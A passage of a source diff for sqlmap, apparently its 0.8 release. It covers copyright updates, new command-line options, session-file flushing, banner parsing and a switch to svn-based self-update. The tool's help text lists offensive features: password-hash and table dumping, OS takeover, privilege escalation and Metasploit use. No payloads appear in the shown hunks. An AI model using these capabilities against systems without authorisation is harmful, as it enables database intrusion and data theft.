+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,8 +27,9 @@ import subprocess
 import sys

 # sqlmap version and site
-VERSION            = "0.8-rc3"
+VERSION            = "0.8"
 VERSION_STRING     = "sqlmap/%s" % VERSION
+DESCRIPTION        = "automatic SQL injection and database takeover tool"
 SITE               = "http://sqlmap.sourceforge.net"

 # sqlmap logger
@@ -51,14 +52,10 @@ PYVERSION          = sys.version.split()[0]
 # Url to update Microsoft SQL Server XML versions file from
 MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"

-# Urls to update sqlmap from
-SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
-SQLMAP_SOURCE_URL  = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
-
 # Database managemen system specific variables
 MSSQL_SYSTEM_DBS   = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
 MYSQL_SYSTEM_DBS   = ( "information_schema", "mysql" )                   # Before MySQL 5.0 only "mysql"
-PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog" )
+PGSQL_SYSTEM_DBS   = ( "information_schema", "pg_catalog", "pg_toast" )
 ORACLE_SYSTEM_DBS  = ( "SYSTEM", "SYSAUX" )                              # These are TABLESPACE_NAME

 MSSQL_ALIASES      = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
@@ -74,6 +71,7 @@ SQL_STATEMENTS     = {
                             "select ",
                             "show ",
                             " top ",
+                             " distinct ",
                             " from ",
                             " from dual",
                             " where ",
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/subprocessng.py
+++ b/lib/core/subprocessng.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -27,8 +27,6 @@ import time

 from lib.core.common import dataToSessionFile
 from lib.core.common import paramToDict
-from lib.core.common import parseTargetUrl
-from lib.core.common import sanitizeCookie
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -73,7 +71,6 @@ def __setRequestParams():

    # Perform checks on Cookie parameters
    if conf.cookie:
-        conf.cookie = sanitizeCookie(conf.cookie)
        conf.parameters["Cookie"] = conf.cookie
        __paramDict = paramToDict("Cookie", conf.cookie)

@@ -119,42 +116,50 @@ def __setOutputResume():
    logger.info("using '%s' as session file" % conf.sessionFile)

    if os.path.exists(conf.sessionFile):
-        readSessionFP = open(conf.sessionFile, "r")
-        lines = readSessionFP.readlines()
+        if not conf.flushSession:
+            readSessionFP = open(conf.sessionFile, "r")
+            lines = readSessionFP.readlines()
    
-        for line in lines:
-            if line.count("][") == 4:
-                line = line.split("][")
+            for line in lines:
+                if line.count("][") == 4:
+                    line = line.split("][")
    
-                if len(line) != 5:
-                    continue
+                    if len(line) != 5:
+                        continue
    
-                url, _, _, expression, value = line
+                    url, _, _, expression, value = line
    
-                if not value:
-                    continue
+                    if not value:
+                        continue
    
-                if url[0] == "[":
-                    url = url[1:]
+                    if url[0] == "[":
+                        url = url[1:]
    
-                if value[-1] == "\n":
-                    value = value[:-1]
+                    if value[-1] == "\n":
+                        value = value[:-1]
    
-                if url != conf.url:
-                    continue
+                    if url != conf.url:
+                        continue
    
-                if url not in kb.resumedQueries.keys():
-                    kb.resumedQueries[url] = {}
-                    kb.resumedQueries[url][expression] = value
+                    if url not in kb.resumedQueries.keys():
+                        kb.resumedQueries[url] = {}
+                        kb.resumedQueries[url][expression] = value
    
-                resumeConfKb(expression, url, value)
+                    resumeConfKb(expression, url, value)
    
-                if expression not in kb.resumedQueries[url].keys():
-                    kb.resumedQueries[url][expression] = value
-                elif len(value) >= len(kb.resumedQueries[url][expression]):
-                    kb.resumedQueries[url][expression] = value
+                    if expression not in kb.resumedQueries[url].keys():
+                        kb.resumedQueries[url][expression] = value
+                    elif len(value) >= len(kb.resumedQueries[url][expression]):
+                        kb.resumedQueries[url][expression] = value
    
-        readSessionFP.close()
+            readSessionFP.close()
+        else:
+            try:
+                os.remove(conf.sessionFile)
+                logger.info("flushing session file")
+            except OSError, msg:
+                errMsg = "unable to flush the session file (%s)" % msg
+                raise sqlmapFilePathException, errMsg

    try:
        conf.sessionFP = open(conf.sessionFile, "a")
@@ -226,6 +231,5 @@ def initTargetEnv():
        kb.unionCount     = None
        kb.unionPosition  = None

-    parseTargetUrl()
    __setRequestParams()
    __setOutputResume()
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/update.py
+++ b/lib/core/update.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -28,12 +28,18 @@ import re
 import shutil
 import sys
 import tempfile
+import time
 import urlparse
 import zipfile

 from distutils.dir_util import mkpath
 from xml.dom.minidom import Document

+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.common import dataToStdout
+from lib.core.common import pollProcess
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import logger
@@ -41,8 +47,6 @@ from lib.core.data import paths
 from lib.core.exception import sqlmapConnectionException
 from lib.core.exception import sqlmapFilePathException
 from lib.core.settings import MSSQL_VERSIONS_URL
-from lib.core.settings import SQLMAP_VERSION_URL
-from lib.core.settings import SQLMAP_SOURCE_URL
 from lib.core.settings import VERSION
 from lib.request.connect import Connect as Request

@@ -196,135 +200,59 @@ def __updateMSSQLXML():
        infoMsg += "last update"
        logger.info(infoMsg)

-def __createFile(pathname, data):
-    mkpath(os.path.dirname(pathname))
-
-    fileFP = open(pathname, "wb")
-    fileFP.write(data)
-    fileFP.close()
-
-def __extractZipFile(tempDir, zipFile):
-    # Check if the saved binary file is really a ZIP file
-    if zipfile.is_zipfile(zipFile):
-        sqlmapZipFile = zipfile.ZipFile(zipFile)
-    else:
-        raise sqlmapFilePathException, "the downloaded file does not seem to be a ZIP file"
-
-    # Extract each file within the ZIP file in the temporary directory
-    for info in sqlmapZipFile.infolist():
-        if info.filename[-1] != '/':
-            data = sqlmapZipFile.read(info.filename)
-            __createFile(os.path.join(tempDir, info.filename), data)
-
 def __updateSqlmap():
-    infoMsg = "updating sqlmap"
+    rootDir = paths.SQLMAP_ROOT_PATH
+
+    infoMsg = "updating sqlmap to latest development version from the "
+    infoMsg += "subversion repository"
    logger.info(infoMsg)

-    debugMsg = "checking if a new version is available"
-    logger.debug(debugMsg)
-
    try:
-        sqlmapNewestVersion, _ = Request.getPage(url=SQLMAP_VERSION_URL, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(SQLMAP_VERSION_URL)
-        __sqlmapHostname = __sqlmapPath[1]
+        import pysvn

-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
+        debugMsg = "sqlmap will update itself using installed python-svn "
+        debugMsg += "third-party library, http://pysvn.tigris.org/"
+        logger.debug(debugMsg)

-        return
+        def notify(event_dict):
+            action = str(event_dict['action'])
+            index = action.find('_')
+            prefix = action[index + 1].upper() if index != -1 else action.capitalize()

-    sqlmapNewestVersion = str(sqlmapNewestVersion).replace("\n", "")
+            if action.find('_update') != -1:
+                return

-    if not re.search("^([\w\.\-]+)$", sqlmapNewestVersion):
-        errMsg = "sqlmap version is in a wrong syntax"
-        logger.error(errMsg)
-
-        return
-
-    if sqlmapNewestVersion == VERSION:
-        infoMsg = "you are already running sqlmap latest stable version"
-        logger.info(infoMsg)
-
-        return
-
-    elif sqlmapNewestVersion > VERSION:
-        infoMsg  = "sqlmap latest stable version is %s. " % sqlmapNewestVersion
-        infoMsg += "Going to download it from the SourceForge File List page"
-        logger.info(infoMsg)
-
-    elif sqlmapNewestVersion < VERSION:
-        infoMsg  = "you are running a version of sqlmap more updated than "
-        infoMsg += "the latest stable version (%s)" % sqlmapNewestVersion
-        logger.info(infoMsg)
-
-        return
-
-    sqlmapBinaryStringUrl = SQLMAP_SOURCE_URL % sqlmapNewestVersion
-
-    try:
-        sqlmapBinaryString, _ = Request.getPage(url=sqlmapBinaryStringUrl, direct=True)
-    except sqlmapConnectionException, _:
-        __sqlmapPath     = urlparse.urlsplit(sqlmapBinaryStringUrl)
-        __sqlmapHostname = __sqlmapPath[1]
-
-        warnMsg  = "sqlmap was unable to connect to %s" % __sqlmapHostname
-        warnMsg += ", check your Internet connection and retry"
-        logger.warn(warnMsg)
-
-        return
-
-    debugMsg  = 'saving the sqlmap compressed source to a ZIP file into '
-    debugMsg += 'the temporary directory and extract it'
-    logger.debug(debugMsg)
-
-    tempDir = tempfile.gettempdir()
-    zipFile = os.path.join(tempDir, "sqlmap-%s.zip" % sqlmapNewestVersion)
-    __createFile(zipFile, sqlmapBinaryString)
-    __extractZipFile(tempDir, zipFile)
-
-    # For each file and directory in the temporary directory copy it
-    # to the sqlmap root path and set right permission
-    for root, _, files in os.walk(os.path.join(tempDir, "sqlmap-%s" % sqlmapNewestVersion)):
-        # Just for development release
-        if '.svn' in root:
-            continue
-
-        cleanRoot = root.replace(tempDir, "")
-        cleanRoot = cleanRoot.replace("%ssqlmap-%s" % (os.sep, sqlmapNewestVersion), "")
-
-        if cleanRoot.startswith(os.sep):
-            cleanRoot = cleanRoot[1:]
-
-        for f in files:
-            # Just for development release
-            if f.endswith(".pyc") or f.endswith(".pyo"):
-                continue
-
-            srcFile = os.path.join(root, f)
-            dstFile = os.path.join(paths.SQLMAP_ROOT_PATH, os.path.join(cleanRoot, f))
-
-            if f == "sqlmap.conf" and os.path.exists(dstFile):
-                infoMsg = "backupping configuration file to '%s.bak'" % dstFile
-                logger.info(infoMsg)
-                shutil.move(dstFile, "%s.bak" % dstFile)
-
-            if os.path.exists(dstFile):
-                debugMsg = "replacing file '%s'" % dstFile
+            if action.find('_completed') == -1:
+                print "%s\t%s" % (prefix, event_dict['path'])
            else:
-                debugMsg = "creating new file '%s'" % dstFile
+                revision = str(event_dict['revision'])
+                index = revision.find('number ')

-            logger.debug(debugMsg)
+                if index != -1:
+                    revision = revision[index+7:].strip('>')

-            mkpath(os.path.dirname(dstFile))
-            shutil.copy(srcFile, dstFile)
+                logger.info('updated to the latest revision %s' % revision)

-            if f.endswith(".py"):
-                os.chmod(dstFile, 0755)
+        client = pysvn.Client()
+        client.callback_notify = notify
+        client.update(rootDir)
+    except ImportError, _:
+        debugMsg = "sqlmap will try to update itself using 'svn' command"
+        logger.debug(debugMsg)

-    infoMsg = "sqlmap updated successfully"
-    logger.info(infoMsg)
+        process = execute("svn update %s" % rootDir, shell=True, stdout=PIPE, stderr=PIPE)
+
+        dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
+        pollProcess(process)
+        svnStdout, svnStderr = process.communicate()
+
+        if svnStderr:
+            errMsg = svnStderr.strip()
+            logger.error(errMsg)
+        elif svnStdout:
+            revision = re.search("revision\s+([\d]+)", svnStdout, re.I)
+            if revision:
+                logger.info('updated to the latest revision %s' % revision.group(1))

 def update():
    if not conf.updateAll:
--- a/lib/parse/init.py
+++ b/lib/parse/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -45,6 +45,7 @@ class MSSQLBannerHandler(ContentHandler):
        self.__inServicePack = False
        self.__release       = None
        self.__version       = ""
+        self.__versionAlt    = None
        self.__servicePack   = ""
        self.__info          = info

@@ -74,18 +75,24 @@ class MSSQLBannerHandler(ContentHandler):

    def endElement(self, name):
        if name == "signature":
-            if re.search(" %s[\.\ ]+" % self.__version, self.__banner):
-                self.__feedInfo("dbmsRelease", self.__release)
-                self.__feedInfo("dbmsVersion", self.__version)
-                self.__feedInfo("dbmsServicePack", self.__servicePack)
+            for version in (self.__version, self.__versionAlt):
+                if version and re.search(" %s[\.\ ]+" % version, self.__banner):
+                    self.__feedInfo("dbmsRelease", self.__release)
+                    self.__feedInfo("dbmsVersion", self.__version)
+                    self.__feedInfo("dbmsServicePack", self.__servicePack)
+                    break

            self.__version     = ""
+            self.__versionAlt  = None
            self.__servicePack = ""

        elif name == "version":
            self.__inVersion = False
            self.__version = self.__version.replace(" ", "")
            
+            match = re.search(r"\A(?P<major>\d+)\.00\.(?P<build>\d+)\Z", self.__version)
+            self.__versionAlt = "%s.0.%s.0" % (match.group('major'), match.group('build')) if match else None
+
        elif name == "servicepack":
            self.__inServicePack = False
            self.__servicePack = self.__servicePack.replace(" ", "")
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -51,7 +51,10 @@ def cmdLineParser():
        target.add_option("-u", "--url", dest="url", help="Target url")

        target.add_option("-l", dest="list", help="Parse targets from Burp "
-                          "or WebScarab logs")
+                          "or WebScarab proxy logs")
+
+        target.add_option("-r", dest="requestFile",
+                          help="Load HTTP request from a file")

        target.add_option("-g", dest="googleDork",
                          help="Process Google dork results as target urls")
@@ -72,7 +75,12 @@ def cmdLineParser():
        request.add_option("--cookie", dest="cookie",
                           help="HTTP Cookie header")

-        request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true",
+        request.add_option("--cookie-urlencode", dest="cookieUrlencode",
+                             action="store_true",
+                             help="URL Encode generated cookie injections")
+
+        request.add_option("--drop-set-cookie", dest="dropSetCookie",
+                           action="store_true",
                           help="Ignore Set-Cookie header from response")

        request.add_option("--user-agent", dest="agent",
@@ -89,16 +97,24 @@ def cmdLineParser():
                           help="Extra HTTP headers newline separated")

        request.add_option("--auth-type", dest="aType",
-                           help="HTTP Authentication type (value "
-                                "Basic, Digest or NTLM)")
+                           help="HTTP authentication type "
+                                "(Basic, Digest or NTLM)")

        request.add_option("--auth-cred", dest="aCred",
-                           help="HTTP Authentication credentials (value "
-                                "name:password)")
+                           help="HTTP authentication credentials "
+                                "(name:password)")
+                                
+        request.add_option("--auth-cert", dest="aCert",
+                           help="HTTP authentication certificate ("
+                                "key_file,cert_file)")

        request.add_option("--proxy", dest="proxy",
                           help="Use a HTTP proxy to connect to the target url")

+        request.add_option("--ignore-proxy", dest="ignoreProxy",
+                            action="store_true",
+                           help="Ignore system default HTTP proxy")
+
        request.add_option("--threads", dest="threads", type="int", default=1,
                           help="Maximum number of concurrent HTTP "
                                "requests (default 1)")
@@ -114,6 +130,9 @@ def cmdLineParser():
                           help="Retries when the connection timeouts "
                                "(default 3)")

+        request.add_option("--scope", dest="scope", 
+                           help="Regexp to filter targets from provided proxy log")
+
        # Injection options
        injection = OptionGroup(parser, "Injection", "These options can be "
                                "used to specify which parameters to test "
@@ -222,25 +241,23 @@ def cmdLineParser():

        enumeration.add_option("--passwords", dest="getPasswordHashes",
                               action="store_true",
-                               help="Enumerate DBMS users password hashes (opt -U)")
+                               help="Enumerate DBMS users password hashes")

        enumeration.add_option("--privileges", dest="getPrivileges",
                               action="store_true",
-                               help="Enumerate DBMS users privileges (opt -U)")
+                               help="Enumerate DBMS users privileges")

        enumeration.add_option("--dbs", dest="getDbs", action="store_true",
                               help="Enumerate DBMS databases")

        enumeration.add_option("--tables", dest="getTables", action="store_true",
-                               help="Enumerate DBMS database tables (opt -D)")
+                               help="Enumerate DBMS database tables")

        enumeration.add_option("--columns", dest="getColumns", action="store_true",
-                               help="Enumerate DBMS database table columns "
-                                    "(req -T opt -D)")
+                               help="Enumerate DBMS database table columns")

        enumeration.add_option("--dump", dest="dumpTable", action="store_true",
-                               help="Dump DBMS database table entries "
-                                    "(req -T, opt -D, -C)")
+                               help="Dump DBMS database table entries")

        enumeration.add_option("--dump-all", dest="dumpAll", action="store_true",
                               help="Dump all DBMS databases tables entries")
@@ -310,8 +327,8 @@ def cmdLineParser():
                                   "write to")

        # Takeover options
-        takeover = OptionGroup(parser, "Operating system access", "This "
-                               "option can be used to access the back-end "
+        takeover = OptionGroup(parser, "Operating system access", "These "
+                               "options can be used to access the back-end "
                               "database management system underlying "
                               "operating system.")

@@ -335,8 +352,7 @@ def cmdLineParser():
                                 "exploitation")

        takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
-                            help="User priv escalation by abusing Windows "
-                                 "access tokens")
+                            help="Database process' user privilege escalation")

        takeover.add_option("--msf-path", dest="msfPath",
                            help="Local path where Metasploit Framework 3 "
@@ -347,8 +363,8 @@ def cmdLineParser():
                                 "directory")

        # Windows registry options
-        windows = OptionGroup(parser, "Windows registry access", "This "
-                               "option can be used to access the back-end "
+        windows = OptionGroup(parser, "Windows registry access", "These "
+                               "options can be used to access the back-end "
                               "database management system Windows "
                               "registry.")

@@ -380,15 +396,18 @@ def cmdLineParser():
                                 help="Save and resume all data retrieved "
                                      "on a session file")
                                      
+        miscellaneous.add_option("--flush-session", dest="flushSession", action="store_true",
+                                 help="Flush session file for current target")
+                                      
        miscellaneous.add_option("--eta", dest="eta", action="store_true",
                                 help="Display for each output the "
                                      "estimated time of arrival")

        miscellaneous.add_option("--gpage", dest="googlePage", type="int",
-                               help="Use google dork results from specified page number")
+                                 help="Use google dork results from specified page number")

        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
-                                help="Update sqlmap to the latest stable version")
+                                  help="Update sqlmap")

        miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
                                 help="Save options on a configuration INI file")
@@ -414,8 +433,8 @@ def cmdLineParser():

        (args, _) = parser.parse_args()

-        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.updateAll:
-            errMsg  = "missing a mandatory parameter ('-u', '-l', '-g', '-c' or '--update'), "
+        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.requestFile and not args.updateAll:
+            errMsg  = "missing a mandatory parameter ('-u', '-l', '-r', '-g', '-c' or '--update'), "
            errMsg += "-h for help"
            parser.error(errMsg)

--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/parse/handler.py
+++ b/lib/parse/handler.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/parse/queriesfile.py
+++ b/lib/parse/queriesfile.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -137,14 +137,16 @@ class queriesHandler(ContentHandler):
        elif name == "inband":
            self.__inband    = sanitizeStr(attrs.get("query"))
            self.__inband2   = sanitizeStr(attrs.get("query2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionInband = sanitizeStr(attrs.get("condition"))
+            self.__conditionInband2 = sanitizeStr(attrs.get("condition2"))

        elif name == "blind":
            self.__blind  = sanitizeStr(attrs.get("query"))
            self.__blind2 = sanitizeStr(attrs.get("query2"))
            self.__count  = sanitizeStr(attrs.get("count"))
            self.__count2 = sanitizeStr(attrs.get("count2"))
+            self.__conditionBlind = sanitizeStr(attrs.get("condition"))
+            self.__conditionBlind2 = sanitizeStr(attrs.get("condition2"))

    def endElement(self, name):
        if name == "dbms":
@@ -161,7 +163,7 @@ class queriesHandler(ContentHandler):

        elif name == "passwords":
            self.__passwords = {}
-            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition }
+            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband }
            self.__passwords["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                           "count": self.__count, "count2": self.__count2 }

@@ -169,7 +171,7 @@ class queriesHandler(ContentHandler):

        elif name == "privileges":
            self.__privileges = {}
-            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
            self.__privileges["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                           "count": self.__count, "count2": self.__count2 }

@@ -185,18 +187,25 @@ class queriesHandler(ContentHandler):

        elif name == "tables":
            self.__tables = {}
-            self.__tables["inband"] = { "query": self.__inband, "condition": self.__condition }
+            self.__tables["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
            self.__tables["blind"]  = { "query": self.__blind, "count": self.__count }

            self.__queries.tables = self.__tables

        elif name == "columns":
            self.__columns = {}
-            self.__columns["inband"] = { "query": self.__inband }
-            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count }
+            self.__columns["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
+            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__conditionBlind }

            self.__queries.columns = self.__columns

+        elif name == "dump_column":
+            self.__dumpColumn = {}
+            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
+            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__conditionBlind, "condition2": self.__conditionBlind2 }
+
+            self.__queries.dumpColumn = self.__dumpColumn
+
        elif name == "dump_table":
            self.__dumpTable = {}
            self.__dumpTable["inband"] = { "query": self.__inband }
--- a/lib/request/init.py
+++ b/lib/request/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -28,6 +28,10 @@ import re
 import StringIO
 import zlib

+from lib.core.common import directoryPath
+from lib.core.common import isWindowsPath
+from lib.core.common import posixToNtSlashes
+from lib.core.common import urlEncodeCookieValues
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.parse.headers import headersParser
@@ -43,6 +47,9 @@ def forgeHeaders(cookie, ua):

    for header, value in conf.httpHeaders:
        if cookie and header == "Cookie":
+            if conf.cookieUrlencode:
+                cookie = urlEncodeCookieValues(cookie)
+
            headers[header] = cookie
        elif ua and header == "User-Agent":
            headers[header] = ua
@@ -68,16 +75,19 @@ def parseResponse(page, headers):
        # Detect injectable page absolute system path
        # NOTE: this regular expression works if the remote web application
        # is written in PHP and debug/error messages are enabled.
-        absFilePathsRegExp = ( r" in <b>(.*?)</b> on line",  r"\b[A-Za-z]:(\\[\w.\\]*)?", r"/[/\w.]+" )
+        absFilePathsRegExp = ( r" in <b>(?P<result>.*?)</b> on line",  r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)" )

        for absFilePathRegExp in absFilePathsRegExp:
            reobj = re.compile(absFilePathRegExp)

            for match in reobj.finditer(page):
-                absFilePath = match.group()
-
+                absFilePath = match.group("result").strip()
+                page = page.replace(absFilePath, "")
+                if isWindowsPath(absFilePath):
+                    absFilePath = posixToNtSlashes(absFilePath)
                if absFilePath not in kb.absFilePaths:
-                    kb.absFilePaths.add(os.path.dirname(absFilePath))
+                    kb.absFilePaths.add(absFilePath)
+                    

 def decodePage(page, encoding):
    """
--- a/lib/request/certhandler.py
+++ b/lib/request/certhandler.py
@@ -1,12 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
